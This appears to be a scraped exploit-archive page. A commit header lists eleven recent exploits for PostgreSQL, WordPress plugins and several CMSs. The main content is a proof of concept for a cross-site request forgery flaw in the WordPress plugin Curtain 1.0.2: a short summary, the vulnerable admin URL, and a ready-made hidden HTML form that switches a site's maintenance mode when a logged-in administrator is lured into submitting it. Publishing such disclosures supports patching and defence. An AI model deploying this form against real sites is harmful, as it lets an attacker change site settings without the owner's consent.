54b7907ae6
11 changes to exploits/shellcodes PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated) Kramer VIAware 2.5.0719.1034 - Remote Code Execution (RCE) ImpressCMS 1.4.2 - Remote Code Execution (RCE) Atom CMS 2.0 - Remote Code Execution (RCE) Drupal avatar_uploader v7.x-1.0-beta8 - Cross Site Scripting (XSS) WordPress Plugin Curtain 1.0.2 - Cross-site Request Forgery (CSRF) WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion WordPress Plugin video-synchro-pdf 1.7.4 - Local File Inclusion WordPress Plugin admin-word-count-column 2.2 - Local File Read CSZ CMS 1.2.9 - 'Multiple' Blind SQLi(Authenticated) WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS
29 lines
No EOL
894 B
Text
29 lines
No EOL
894 B
Text
# Exploit Title: WordPress Plugin Curtain 1.0.2 - Cross-site Request Forgery (CSRF)
|
|
# Date: 24-03-2022
|
|
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
|
|
# Vendor Homepage: https://wordpress.org/plugins/curtain/
|
|
# Version: 1.0.2
|
|
# Tested on: Firefox
|
|
|
|
## Summary:
|
|
|
|
Cross site forgery vulnerability has been identified in curtain WordPress plugin that allows an attacker to to activate or deactivate sites maintenance mode.
|
|
|
|
## Vulnerable URL:
|
|
|
|
http://localhost:10003/wp-admin/options-general.php?page=curtain&_wpnonce=&mode=0
|
|
|
|
## CSRF POC Exploit
|
|
|
|
```
|
|
<html>
|
|
<body>
|
|
<form action="http://localhost:10003/wp-admin/options-general.php">
|
|
<input type="hidden" name="page" value="curtain" />
|
|
<input type="hidden" name="_wpnonce" value="" />
|
|
<input type="hidden" name="mode" value="0" />
|
|
<input type="submit" value="Submit request" />
|
|
</form>
|
|
</body>
|
|
</html>
|
|
``` |